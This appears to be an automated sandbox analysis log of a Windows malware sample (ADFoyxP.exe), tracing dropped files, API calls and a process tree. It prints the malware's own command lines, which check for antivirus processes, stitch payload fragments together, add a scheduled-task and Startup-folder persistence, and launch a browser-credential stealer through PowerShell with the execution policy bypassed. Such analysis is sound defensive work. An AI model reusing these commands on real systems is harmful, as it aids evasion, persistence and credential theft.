Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00849FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00849FD2

Spam, unwanted Advertisements and Ransom Demands

barindex
Writes many files with high entropy
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Gate.pub entropy: 7.9966611885Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Preference.pub entropy: 7.99684640346Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Apartments.pub entropy: 7.99764085482Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Republican.pub entropy: 7.99632178366Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Amenities.pub entropy: 7.99702026084Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Worcester.pub entropy: 7.99796554729Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Generating.pub entropy: 7.99807030539Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Regulation.pub entropy: 7.99630322854Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Performing.pub entropy: 7.99750792054Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Robert.pub entropy: 7.99725695551Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Argentina.pub entropy: 7.99765353495Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Distinguished.pub entropy: 7.99809266375Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Poem.pub entropy: 7.99733876431Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Governor.pub entropy: 7.99796220639Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Swingers.pub entropy: 7.99812528823Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Legislation.pub entropy: 7.99786443988Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Explicitly.pub entropy: 7.99686467774Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Comparison.pub entropy: 7.99674290091Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Enlarge.pub entropy: 7.99778287234Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Listening.pub entropy: 7.99720925196Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Maintains.pub entropy: 7.99814457245Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Document.pub entropy: 7.99688077856Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Confusion.pub entropy: 7.99759203123Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Reverse.pub entropy: 7.99813463449Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Vacation.pub entropy: 7.99753681116Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Vampire.pub entropy: 7.99666754967Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Blood.pub entropy: 7.99804267671Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Hell.pub entropy: 7.99698268184Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Breaks.pub entropy: 7.99810429407Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Concept.pub entropy: 7.99720276963Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Really.pub entropy: 7.99835078472Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Urban.pub entropy: 7.99778737709Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Trademarks.pub entropy: 7.99757414761Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Thousand.pub entropy: 7.99729046263Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Silly.pub entropy: 7.99829492948Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Both.pub entropy: 7.99806131353Jump to dropped file
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Bull.pub entropy: 7.99770447322Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\m entropy: 7.99992399201Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\F entropy: 7.99992399201Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99602810784Jump to dropped file

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript called in batch mode (surpress errors)
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00824763: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,23_2_00824763
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00811B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,23_2_00811B4D
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_0081F20D
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\PerfectlyFdaJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\AccreditationShedJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\GovernmentsHighlyJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\HighKerryJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\PracticalPreventJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\FilenameWhoJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Windows\UpdatedMakeupJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D801723_2_007D8017
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007CE14423_2_007CE144
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007BE1F023_2_007BE1F0
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007EA26E23_2_007EA26E
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B22AD23_2_007B22AD
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D22A223_2_007D22A2
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007CC62423_2_007CC624
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007EE87F23_2_007EE87F
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0083C8A423_2_0083C8A4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00822A0523_2_00822A05
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007E6ADE23_2_007E6ADE
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00818BFF23_2_00818BFF
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007CCD7A23_2_007CCD7A
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007DCE1023_2_007DCE10
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007E715923_2_007E7159
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B924023_2_007B9240
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0084531123_2_00845311
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B96E023_2_007B96E0
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D170423_2_007D1704
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D1A7623_2_007D1A76
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B9B6023_2_007B9B60
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D7B8B23_2_007D7B8B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D1D2023_2_007D1D20
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D7DBA23_2_007D7DBA
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D1FE723_2_007D1FE7
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: String function: 007D0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: String function: 007CFD52 appears 40 times
Source: ADFoyxP.exeStatic PE information: invalid certificate
Source: curcuma.exe.26.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: curcuma.exe.26.drStatic PE information: Number of sections : 11 > 10
Source: ADFoyxP.exe, 00000000.00000002.1650753368.0000000000960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs ADFoyxP.exe
Source: ADFoyxP.exe, 00000000.00000003.1648850593.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs ADFoyxP.exe
Source: ADFoyxP.exe, 00000000.00000003.1648351362.0000000000959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs ADFoyxP.exe
Source: ADFoyxP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ADFoyxP.exeStatic PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: classification engineClassification label: mal100.rans.spyw.expl.evad.mine.winEXE@110/160@24/27
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008241FA GetLastError,FormatMessageW,23_2_008241FA
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00812010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,23_2_00812010
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00811A0B AdjustTokenPrivileges,CloseHandle,23_2_00811A0B
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,23_2_0081DD87
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00823A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,23_2_00823A0E
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\scoped_dir8680_1554559384
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure InnovationsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8304:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeMutant created: \Sessions\1\BaseNamedObjects\filemanager1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\KzwgQiLBsKNC8MJ0zZKWm7EQADmHtlQcAqGCr8Sw14/KL57tXLJJZTjsUP4ab24f22LPEwrDGtXSF6zdOKZ5wg==
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:304:WilStaging_02
Source: C:\Users\user\Desktop\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\nswDC84.tmpJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: ADFoyxP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\Desktop\ADFoyxP.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: ADFoyxP.exeReversingLabs: Detection: 13%
Source: ADFoyxP.exeVirustotal: Detection: 35%
Source: C:\Users\user\Desktop\ADFoyxP.exeFile read: C:\Users\user\Desktop\ADFoyxP.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\ADFoyxP.exe "C:\Users\user\Desktop\ADFoyxP.exe"
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2184,i,15394741629772577023,2250770724390570129,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2204 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7206107532581912577,15538010115052324354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.batJump to behavior
